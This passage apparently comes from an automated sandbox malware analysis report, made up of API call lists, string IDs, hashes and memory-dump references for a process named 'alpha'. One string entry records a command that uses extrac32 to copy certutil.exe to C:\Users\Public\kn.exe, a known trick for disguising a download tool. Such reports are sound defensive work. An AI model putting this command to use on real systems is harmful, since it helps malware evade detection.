                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF7D15266C4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D15266E4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7D1526570,?,?,?,?,?,?,00000000,00007FF7D1526488), ref: 00007FF7D15266FE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2348642995-441775793
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: FAT$~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2238823677-1832570214
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151D884
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151D89D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151D94D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151D964
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D151DB89
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF7D151DBDF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcstol.MSVCRT ref: 00007FF7D151DC63
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT ref: 00007FF7D151DD33
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT ref: 00007FF7D151DE9A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7D151FE2A), ref: 00007FF7D151DF1F
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1051989028-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3223794493-3086019870
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3124875276
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15258E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7D153C6DB), ref: 00007FF7D15258EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D152084E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • towupper.MSVCRT ref: 00007FF7D153C1C9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D153C31C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7D153C5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2242554020-619615743
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e46b99c3994265045476c03cb7eba92e7f2199e383dbb177ad3bf062ac3f51a1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE126D22A1865B81FB60AB15A45417EE2A0EF44BA4FD44237EA9F437F0DFBCE541D720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D1527013
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D1527123
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1521EA0: wcschr.MSVCRT(?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7D1540D54), ref: 00007FF7D1521EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D152706E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcsncmp.MSVCRT ref: 00007FF7D15270A5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcsstr.MSVCRT ref: 00007FF7D152F9DB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D152FA00
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D152FA5F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152823C: FindFirstFileExW.KERNELBASE ref: 00007FF7D1528280
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D152829D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D153EAC5,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1523A56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D152FA3D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: \\.\
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 799470305-2900601889
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 45641eb0eff130fb082ac728d5ba9bfa22c9c976e857eaff00dbf4da17e30bf9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E519432A08A8B85FB60AF10A8002BDB7A1FF85B44FD54576DA4F877A4DFBCD5458320
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1944892715-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 24c231ae65fbe9e86160602db6a3fbe62c011976bf551ddbd33c3040b8e961f3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3B16B22B0964B86FB65BF11A45017DF6A1AF55B84FD58476CA4F4B3B0EEBCE4808730
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15154DE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D151552B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D151554F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D153345F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D153347E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D15334C3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15334DB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D15334FA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: _get_osfhandle.MSVCRT ref: 00007FF7D1523715
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7D1523770
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1523791
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1356649289-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 44cbd729083780951c1f503392cbbf612fffa393e2779505a21ce0bf26885d22
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA916D22A0864B86F754AF21A40417DF7A1FB89B90FD54136DA4F476B5DFBCD4808B20
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: LocalTime$ErrorLast_get_osfhandle
• String ID: %s$/-.$:
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1537251), ref: 00007FF7D153628E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: ObjectSingleWait
• String ID: wil
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
• String ID: $Application$System
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
• String ID: :$\
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1397130798-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 724f7ca6de1d2199ac7a1f6292729104aec5d7855033ff602e4af0a6132ac251
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4891A522B0868B96FB65AB10D4406BDF3A1FB84B84FC58076DA4F437A4DFBDD5818720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D15225CA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D15225E8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D152260F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D1522636
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D1522650
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3407644289-1668778490
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 827fe39f1c827591467e2895404ed0c53e3c9c8069902dc6501238c6b755d561
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0313A27A1851B85FB617F21E81537DA694AF85B80FE48077DA0F862B5DEBCE400C731
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2516562204-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
